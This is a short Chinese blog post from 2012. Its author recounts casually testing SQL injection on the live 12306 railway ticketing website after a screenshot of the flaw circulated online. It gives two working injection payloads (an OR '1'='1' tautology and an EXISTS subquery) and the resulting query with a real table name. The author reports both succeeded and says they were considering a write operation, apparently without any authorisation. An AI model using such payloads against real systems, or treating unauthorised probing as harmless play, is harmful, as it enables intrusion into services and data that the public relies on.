玩玩12306的SQL注入漏洞

Linvo

于 2012-09-27 21:09:54 发布

阅读量4.6k

点赞数 3

分类专栏： SQL/noSQL

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接：https://blog.csdn.net/linvo/article/details/8026373

版权

SQL/noSQL 专栏收录该内容

30 篇文章 0 订阅

订阅专栏

下午那会儿微博上疯传一张12306的SQL注入漏洞截图：

以前没怎么玩过，那会儿正好有空，所以就上去瞅瞅。

根据trace提示简单构造一个：

' OR '1'='1' OR ZIZ='

注入后的效果应就是：

select * from TB_INFO_CLCS where flag = 'Y' and czdm ='G' and cxdm like '%' OR '1'='1' OR ZIZ='%' order by cxdm

果了个然~！成功鸟~！

同理再构造个子查询：

' AND EXISTS (SELECT * FROM TB_INFO_CLCS) OR ZIZ='

没报错，又成功鸟~！

当我正在考虑是否搞个写操作的时候，铁道部迅速撤下了相关页面：

晚上回家后发现该漏洞已经修复鸟~~~~~~

关注

3
点赞
踩
2

收藏

觉得还不错? 一键收藏
4
评论
玩玩12306的SQL注入漏洞

下午那会儿微博上疯传一张12306的SQL注入漏洞截图：以前没怎么玩过，那会儿正好有空，所以就上去瞅瞅。根据trace提示简单构造一个：' OR '1'='1' OR ZIZ='注入后的效果应就是：select * from TB_INFO_CLCS where flag = 'Y' and czdm ='G' and cxdm like '%' OR
复制链接

扫一扫

专栏目录

评论 4

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。